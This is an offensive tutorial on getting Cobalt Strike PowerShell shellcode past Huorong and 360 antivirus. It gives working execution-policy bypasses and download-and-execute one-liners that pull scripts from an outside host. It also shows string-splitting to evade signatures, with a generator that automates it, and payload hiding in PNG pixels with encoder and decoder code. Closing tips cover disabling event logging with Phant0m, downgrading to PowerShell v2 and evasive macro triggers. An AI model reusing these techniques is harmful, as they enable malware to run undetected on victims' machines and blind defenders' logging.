
#2 - Methods to execute shellcode bypassing Huorong and 360 antivirus software (To be continued)

Using PowerShell script to load shellcode

Pre-knowledge

PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Initially a Windows component only, known as Windows PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core. The former is built on the .NET Framework, the latter on .NET Core.

Third-party developers can add cmdlets and providers to PowerShell. Cmdlets may be used by scripts and scripts may be packaged into modules.

That is the definition of PowerShell from Wikipedia. What matters for us is that PowerShell gives access to some very powerful features: it can run a ps1 script directly in memory without writing a file to disk, and it can call anything the .NET Framework provides.

There are already many powerful post-exploitation frameworks and tools built on PowerShell, such as PowerSploit, PowerCat and Empire. What we are going to discuss today, though, is loading our shellcode via PowerShell.

Starting

We can use a PowerShell script to achieve our goal. But before we execute the script, we should check the PowerShell execution policy on the target.

There are six execution policies in PowerShell. Keep in mind that the execution policy is not a security boundary: it only decides whether script files are loaded, and it never blocks commands typed at the prompt or passed with -Command.

  • Unrestricted

    Run any script; scripts downloaded from the Internet only prompt for confirmation first

  • Restricted

    The default on Windows client systems; no script file is run at all, only interactive commands

  • AllSigned

    Every script, local or remote, must be signed by a trusted publisher

  • RemoteSigned

    Local scripts run without restriction, but scripts downloaded from the network must be signed (the default on Windows Server)

  • Bypass

    Nothing is blocked and no warnings or prompts are shown

  • Undefined

    No policy is set in this scope; the effective policy comes from the next scope in precedence, and Restricted applies when every scope is Undefined

We can check the execution policy of the target with this command. Get-ExecutionPolicy is a PowerShell cmdlet, so from cmd it is run by prefixing it with powershell; from a PowerShell prompt the prefix is not needed. Adding -List shows the policy set in every scope, which tells you whether it comes from Group Policy or from a local setting.

powershell Get-ExecutionPolicy
image-20200428152459763

This is the execution policy on my laptop, which is also the default PowerShell execution policy on Windows client systems.

Let’s try to execute a PowerShell script file and see what happens.

image-20200428153559331

As mentioned before, the default policy stops us from running the external ps1 script file.
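Which scope the policy comes from decides which bypass will work later on, so here is an added example of my own (not code from the original post; the function name Test-ExecutionPolicyOverride is my choice) that lists every scope and reports whether a command-line -ExecutionPolicy Bypass will take effect:

```powershell
# Added example, not from the original post: list the execution policy of
# every scope and report whether "-ExecutionPolicy Bypass" on the command line
# will take effect. Precedence is MachinePolicy, UserPolicy, Process,
# CurrentUser, LocalMachine: the first scope that is not Undefined wins.
# MachinePolicy and UserPolicy come from Group Policy and cannot be overridden
# by the command-line switch, which only sets the Process scope.
function Test-ExecutionPolicyOverride {
    $scopes = Get-ExecutionPolicy -List    # one object per scope (Scope, ExecutionPolicy)

    $enforced = @($scopes | Where-Object {
        ($_.Scope.ToString() -in 'MachinePolicy', 'UserPolicy') -and
        ($_.ExecutionPolicy.ToString() -ne 'Undefined')
    })

    [pscustomobject]@{
        Effective      = (Get-ExecutionPolicy).ToString()   # what the engine applies right now
        EnforcedByGPO  = $enforced.Count -gt 0
        BypassWillWork = $enforced.Count -eq 0
        Scopes         = $scopes
    }
}

$r = Test-ExecutionPolicyOverride
$r.Scopes | Format-Table -AutoSize
if ($r.BypassWillWork) {
    "Effective policy $($r.Effective) is set locally: powershell -ExecutionPolicy Bypass will work."
} else {
    "Policy is enforced by Group Policy: use an in-memory method such as Get-Content | Invoke-Expression instead."
}
```

When EnforcedByGPO is true, the -ExecutionPolicy switch is silently ignored, but the methods that never load a script file (reading the script from stdin or piping its content into Invoke-Expression) are unaffected, because the policy only governs script files.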

Bypass the PowerShell execution policy

Luckily, there are several ways to bypass the PowerShell execution policy. First, let's look at the meaning of a few characters and commands that will help us execute our PowerShell script file.

Character   Meaning
|           pipe: pass the output of one command to the next command as its input
;           statement separator: run several commands in sequence on one line
&           call operator: run a command, script file or function whose name or path is given as a string (needed for a path that contains spaces)

Command                                    Meaning
Get-Host                                   show information about the host, including its version ($PSVersionTable.PSVersion is the direct way to read the engine version)
Get-Content <file>                         read the content of a file
Set-Content test.txt -Value "your value"   write content to a file
Get-Process                                list the currently running processes
Get-Location                               show the current working location (path)

Modify the execution policy temporary

Set the execution policy to Bypass or Unrestricted for this process only. The -ExecutionPolicy switch applies to the powershell.exe process being started and does not change the stored setting, so it leaves no persistent change on the target. It cannot override a policy enforced through Group Policy (the MachinePolicy and UserPolicy scopes); in that case fall back to the in-memory methods described further down.

powershell -ExecutionPolicy Bypass -File "C:\Users\L1ng Feng\Desktop\1.ps1"

You can also use the concise form (-ep is the short alias of -ExecutionPolicy). Note that without -File the remaining text is passed as a command rather than as a file path, so if the path contains spaces, as this one does, stick with -File or invoke the path with the & call operator.

powershell -ep Bypass "C:\Users\L1ng Feng\Desktop\1.ps1"

Because the argument is treated as a command, you can also import the script as a module and call the functions it defines:

powershell -ExecutionPolicy Bypass "import-module 'C:\Users\L1ng Feng\Desktop\1.ps1';Get-ChinaTimeAlias"

Executed successfully.

image-20200428155850445

Using “Get-Content” and “|”

Get-Content 1.ps1 | powershell -NoProfile -

The trailing - tells powershell.exe to read its commands from standard input, so the execution policy, which only applies to script files, never comes into play.
image-20200428195046748

Invoke-Expression evaluates a string as PowerShell code, so you can also pipe the file content into it. Run this form from a PowerShell prompt: from cmd the | would be handled by cmd itself, so there the whole pipeline has to be quoted after -c.

powershell Get-Content "C:\Users\L1ng Feng\Desktop\1.ps1" | Invoke-Expression

There is also a concise form (gc is the alias of Get-Content and iex is the alias of Invoke-Expression).

gc "C:\Users\L1ng Feng\Desktop\1.ps1" | iex

image-20200428200147437

We can also use type, another alias of Get-Content in Windows PowerShell, in place of Get-Content.

image-20200428202531021

However, these methods have a drawback: the script content still sits on the local disk, so for certain scripts it may be detected by antivirus file scanning before it ever runs.

Using “Net.WebClient” to download the remote script file and run it via IEX

This is the content served at http://192.168.1.12/

image-20200428203615955

Then run this command.

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.12/')"

image-20200428203655061

-c is short for -Command. New-Object creates a Net.WebClient instance, DownloadString fetches the page body into a string, and IEX executes that string in memory, so nothing is written to disk.

However, when we actually execute these commands, 360 antivirus may intercept them, like this:

image-20200428204550162

How to deal with this situation?

Bypass anti-virus software

Tokens such as "encoded", "IEX", "DownloadString", "http" and "hidden" on the command line are matched by antivirus signatures, and the command is blocked.

Since the detection is matching on these specific strings in the process command line, we can break them up with string concatenation: no flagged token appears contiguously in the command line, yet the same string is assembled at run time. Keep in mind that this only defeats command-line matching. Script Block Logging (event ID 4104) and AMSI in PowerShell 5 and later see the reconstructed string at the moment it is handed to Invoke-Expression.

Let's run these commands via cmd.

powershell -c "$s1='IE';$s2='X(New-Object Net.WebClient).Downlo';$s3='adString(''http://192.168.1.12/'')';IEX ($s1+$s2+$s3)"

We can also use Replace to rebuild part of the string.

powershell -c "$s1='IEX(New-Object Net.WebClient).Downlo';$s2='wtf(''http://192.168.1.12/'')'.Replace('wtf','adString');IEX ($s1+$s2)"

image-20200428214554983

Bypass successful.
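Rather than hand-splitting every new command, here is an added helper of my own (not code from the original post; the name New-SplitCommand and the -MaxRun parameter are my invention) that produces the split form for any command and guarantees that no run of the original longer than a chosen length survives intact on the command line:

```powershell
# Added example, not from the original post: turn any PowerShell command into
# the split-string form shown above. No run of more than $MaxRun characters of
# the original survives contiguously in the output, so tokens such as "IEX",
# "DownloadString" or "http" can no longer be matched on the command line.
function New-SplitCommand {
    param(
        [Parameter(Mandatory)] [string] $Command,
        [int] $MaxRun = 3   # longest piece of the original left intact
    )
    if ($MaxRun -lt 1) { throw 'MaxRun must be at least 1' }

    # Cut the original text first and escape each piece afterwards, so that a
    # single quote is never separated from the '' that escapes it in a literal.
    $parts = @(for ($i = 0; $i -lt $Command.Length; $i += $MaxRun) {
        $len = [math]::Min($MaxRun, $Command.Length - $i)
        $Command.Substring($i, $len).Replace("'", "''")
    })

    # $s0='..';$s1='..';...  followed by the reassembly expression $s0+$s1+...
    $assign = @(for ($n = 0; $n -lt $parts.Count; $n++) { "`$s$n='$($parts[$n])'" })
    $sum    = @(for ($n = 0; $n -lt $parts.Count; $n++) { "`$s$n" }) -join '+'

    # Evaluate the reassembled string. & ([scriptblock]::Create(...)) does the
    # same job as IEX without writing the IEX token at all; use "IEX ($sum)"
    # instead for the exact style used in the post.
    ($assign -join ';') + ";& ([scriptblock]::Create($sum))"
}

# Wrap the output for cmd as:  powershell -c "<output>"
New-SplitCommand -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.12/')" -MaxRun 4
```

The output contains only single quotes, $, ;, + and parentheses, so it can be dropped into a double-quoted -c argument from cmd unchanged. Script Block Logging and AMSI still see the reassembled text when it executes, and process-creation logging still records the split command line, so this only defeats signatures that match the launching command line.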

Shellcode Time ; )

In Cobalt Strike, there are two ways to generate a PowerShell payload.

PowerShell command

powershell -nop -w hidden -encodedcommand xxxxx...

But as mentioned before, some of these tokens (-w hidden, -encodedcommand) are detected by antivirus software.

What's more, pushing a long base64-encoded blob through the command line is not that smart either: it is conspicuous, and the whole command line ends up in process-creation logs.

PowerShell Script File

As for me, I prefer this method for loading shellcode (the reasons follow).

Go to Attacks - Packages - Payload Generator.

image-20200428223928303

Choose your Listener and set the Output as PowerShell.

After clicking Generate, you get a PowerShell script file.

Then host this file on a web server and run the processed command via cmd on your target.

powershell -c "$s1='IE';$s2='X(New-Object Net.WebClient).Downlo';$s3='adString(''http://192.168.1.15/1.txt'')';IEX ($s1+$s2+$s3)"

Here we go : )

result1

PS: to bypass other antivirus software, we can obfuscate the script with Invoke-Obfuscation, or hide the script file inside a PNG image.

Hide your PowerShell Script File

For example, let's hide our PowerShell payload in a PNG file using Invoke-PSImage.

Generate the PNG payload

Invoke-PSImage -Script .\1.ps1 -Image .\1.jpg -Out .\payload.png -Web

1.ps1 is your PowerShell payload file and 1.jpg is the carrier image. The output has to be PNG, a lossless format: the payload lives in the low bits of the pixel values, and JPEG compression would destroy it. -Web makes Invoke-PSImage print a one-liner that fetches the image over HTTP instead of reading it from disk.

Run on your target

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://localhost/payload.png"));$o=a Byte[] 3840;(0..1)|%{foreach($x in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3598]))

Reading the one-liner: sal a New-Object aliases New-Object to a, so that name appears only once; the image is opened over HTTP as a Bitmap; then, for every pixel of the 1920x2 image, one script byte is rebuilt from the low four bits of the blue channel (high nibble) and the low four bits of the green channel (low nibble); finally the first 3599 recovered bytes are decoded as ASCII and passed to IEX. The URL, the dimensions and the byte count are specific to this image, so use the one-liner Invoke-PSImage prints for your own image rather than copying these numbers.

Let's see the execution result (again with 360 and Huorong running in the background).

result2
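To make the pixel arithmetic of that one-liner concrete, here is an added example of my own (not Invoke-PSImage's code and not from the original post) that packs a script into an image with the same nibble layout and reads it back. The function names ConvertTo-PixelScript and ConvertFrom-PixelScript, the optional -CarrierPath parameter and the output path under $env:TEMP are my choices:

```powershell
# Added example, not from the original post and not Invoke-PSImage's own code:
# the nibble layout the one-liner above decodes, as a local encode/decode pair.
# One script byte per pixel: the high nibble goes into the low 4 bits of Blue,
# the low nibble into the low 4 bits of Green. The upper bits of every channel
# are left alone, so an existing carrier image changes very little. The output
# must be PNG (lossless); JPEG compression would destroy the nibbles.
Add-Type -AssemblyName System.Drawing

function ConvertTo-PixelScript {
    param(
        [Parameter(Mandatory)] [string] $Script,
        [Parameter(Mandatory)] [string] $OutPath,   # absolute path: .NET ignores the PowerShell location
        [string] $CarrierPath,                       # optional non-indexed image to hide the script in
        [int]    $Width = 1920                       # used only when no carrier is given
    )
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Script)
    if ($CarrierPath) {
        $bmp = New-Object System.Drawing.Bitmap($CarrierPath)
    } else {
        $height = [int][math]::Ceiling($bytes.Length / $Width)
        $bmp = New-Object System.Drawing.Bitmap($Width, $height)
        # A fresh bitmap is transparent black; make it opaque white first
        $gfx = [System.Drawing.Graphics]::FromImage($bmp)
        $gfx.Clear([System.Drawing.Color]::White)
        $gfx.Dispose()
    }
    if ($bmp.Width * $bmp.Height -lt $bytes.Length) {
        throw "Image holds $($bmp.Width * $bmp.Height) bytes, script needs $($bytes.Length)"
    }
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $x = $i % $bmp.Width
        $y = [int][math]::Floor($i / $bmp.Width)
        $p = $bmp.GetPixel($x, $y)
        $v = [int]$bytes[$i]
        $g = ($p.G -band 0xF0) -bor ($v -band 0x0F)   # low nibble  -> green
        $b = ($p.B -band 0xF0) -bor ($v -shr 4)       # high nibble -> blue
        $bmp.SetPixel($x, $y, [System.Drawing.Color]::FromArgb($p.A, $p.R, $g, $b))
    }
    $bmp.Save($OutPath, [System.Drawing.Imaging.ImageFormat]::Png)
    $bmp.Dispose()
    return $bytes.Length      # the decoder needs this count
}

function ConvertFrom-PixelScript {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [int]    $Length
    )
    $bmp = New-Object System.Drawing.Bitmap($Path)
    $out = New-Object byte[] $Length
    for ($i = 0; $i -lt $Length; $i++) {
        $p = $bmp.GetPixel($i % $bmp.Width, [int][math]::Floor($i / $bmp.Width))
        # identical arithmetic to the one-liner: (B -band 15) * 16 -bor (G -band 15)
        $out[$i] = (($p.B -band 15) * 16) -bor ($p.G -band 15)
    }
    $bmp.Dispose()
    return [System.Text.Encoding]::ASCII.GetString($out)   # returned, never executed here
}

# Round trip on a constructed script. The decoded text is returned so that it
# can be inspected before anything is ever handed to IEX.
$script = "Write-Output 'hello from a pixel'"
$png    = Join-Path $env:TEMP 'payload.png'
$len    = ConvertTo-PixelScript -Script $script -OutPath $png -Width 64
(ConvertFrom-PixelScript -Path $png -Length $len) -eq $script   # True
```

The decoder deliberately stops at returning the string: on a target the last step would be IEX, but when you are testing your own image you want to diff the decoded text against the original script first, because a carrier saved through a lossy format or an indexed PNG will silently hand you garbage.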

At the end of this section, a few tips for using PowerShell:

  • If PowerShell v2 is present on the target, use it: v2 lacks the script block and module logging added in later versions, so you leave fewer traces. Bear in mind that v2 needs .NET Framework 3.5, which is not installed by default on recent systems, and that the engine start itself is logged (PowerShell event ID 400 with EngineVersion 2.0), which many blue teams alert on as a downgrade attack.
  • If you have high privileges, or can escalate first, use Phant0m. When Phant0m runs successfully the Windows Event Log service stops working: the target cannot collect logs, and therefore cannot forward them either. At the same time the service still appears to be running, because the svchost.exe process hosting it is not stopped, only its threads are. That is the main advantage and purpose of Phant0m: the service is dead, but everything seems to be working.
  • Definitely use obfuscation if you use public scripts or techniques on the target system.
  • Develop your own methods against behavioral detection. For example, if you launch PowerShell from a PowerPoint file through a macro, use a trigger other than the usual auto-open function in VBA: since everyone triggers their payload that way, it is flagged as malicious by security solutions straight away. Trigger the payload instead when the slideshow switches to full-screen mode, and you bypass many security solutions.